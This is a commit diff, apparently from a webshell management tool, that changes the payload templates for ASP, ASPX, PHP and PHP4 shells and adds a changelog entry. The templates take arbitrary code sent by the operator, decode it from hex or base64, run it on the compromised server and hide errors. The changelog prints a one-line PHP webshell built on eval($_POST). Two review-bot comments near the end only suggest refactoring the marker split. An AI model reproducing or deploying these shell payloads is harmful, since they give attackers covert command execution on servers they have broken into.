Commit 5fa6caef authored by Medicean's avatar Medicean

Fix(Core): 修复使用 default 编码器服务端其它函数输出 payload 时数据分割解析的问题

parent ffa859ef
...@@ -20,6 +20,15 @@ ...@@ -20,6 +20,15 @@
opts: opts: 类型为 Object, Shell 配置 opts: opts: 类型为 Object, Shell 配置
} }
``` ```
* 修复使用 default 编码器服务端其它函数输出 payload 时数据分割解析的问题
eg:
```php
<?php phpinfo();eval($_POST['ant']);phpinfo();?>
```
因为 `phpinfo();` 会显示发送的 payload, 发送的 payload 中含有数据分割符,导致分割出错
## 2021/02/06 `v(2.1.10)` ## 2021/02/06 `v(2.1.10)`
......
...@@ -83,7 +83,7 @@ class ASP extends Base { ...@@ -83,7 +83,7 @@ class ASP extends Base {
let hexCode = formatter['hex'](data['_']); let hexCode = formatter['hex'](data['_']);
// 组合完整的代码 // 组合完整的代码
data['_'] = `eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""${tag_s}""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""${hexCode}"""")):Response.Write(""""${tag_e}""""):Response.End"")")`; data['_'] = `eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""${tag_s.substr(0,tag_s.length/2)}""""&""""${tag_s.substr(tag_s.length/2)}""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""${hexCode}"""")):Response.Write(""""${tag_e.substr(0,tag_e.length/2)}""""&""""${tag_e.substr(tag_e.length/2)}""""):Response.End"")")`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
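Review bot: The midpoint split is spelled out four times in this template with `substr(0,tag_s.length/2)` / `substr(tag_s.length/2)`, and the same expressions are repeated in the ASPX, PHP and PHP4 hunks. `String.prototype.substr` is a legacy method, and `length/2` is fractional for odd-length markers, so the code depends on implicit truncation to keep the two halves consistent. For a marker of length 1 the first half is empty and the second half is the whole marker, so the split does nothing; the marker length is not visible in this hunk, so this may not occur in practice. Computing the halves once before the template would make this explicit: `const mid = Math.floor(tag_s.length / 2);` followed by `tag_s.slice(0, mid)` and `tag_s.slice(mid)`, ideally in one shared helper on the base class. The enclosing method starts and ends outside the hunk.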
......
...@@ -95,7 +95,7 @@ class ASPX extends Base { ...@@ -95,7 +95,7 @@ class ASPX extends Base {
// base64编码一次数据 // base64编码一次数据
let base64Code = formatter['base64'](data['_']); let base64Code = formatter['base64'](data['_']);
data['_'] = `Response.Write("${tag_s}");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("${tag_e}");Response.End();`; data['_'] = `Response.Write("${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}");Response.End();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
...@@ -85,7 +85,7 @@ class PHP extends Base { ...@@ -85,7 +85,7 @@ class PHP extends Base {
} }
// 组合完整的代码 // 组合完整的代码
let tmpCode = data['_']; let tmpCode = data['_'];
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`; data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
...@@ -35,7 +35,7 @@ class PHP4 extends PHP { ...@@ -35,7 +35,7 @@ class PHP4 extends PHP {
} }
// 组合完整的代码 // 组合完整的代码
let tmpCode = data['_']; let tmpCode = data['_'];
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}ob_start();${tmpCode};asoutput();die();`; data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();${tmpCode};asoutput();die();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
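Review bot: The `function asoutput(){...}` fragment in this template is character-for-character the same as the one in the PHP hunk, so this fix had to be made twice and the two copies can drift apart. Since `PHP4 extends PHP`, the wrapper text could come from one method on the parent that takes `tag_s` and `tag_e`, leaving only the `try{...}catch` difference in each subclass. A short comment above the template, for example `// markers are emitted as two concatenated literals so the full marker never appears in the request body`, would also record why the split exists, because the existing `// 组合完整的代码` comment does not. Whether PHP4 can reuse a parent helper here depends on code outside the hunk.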
......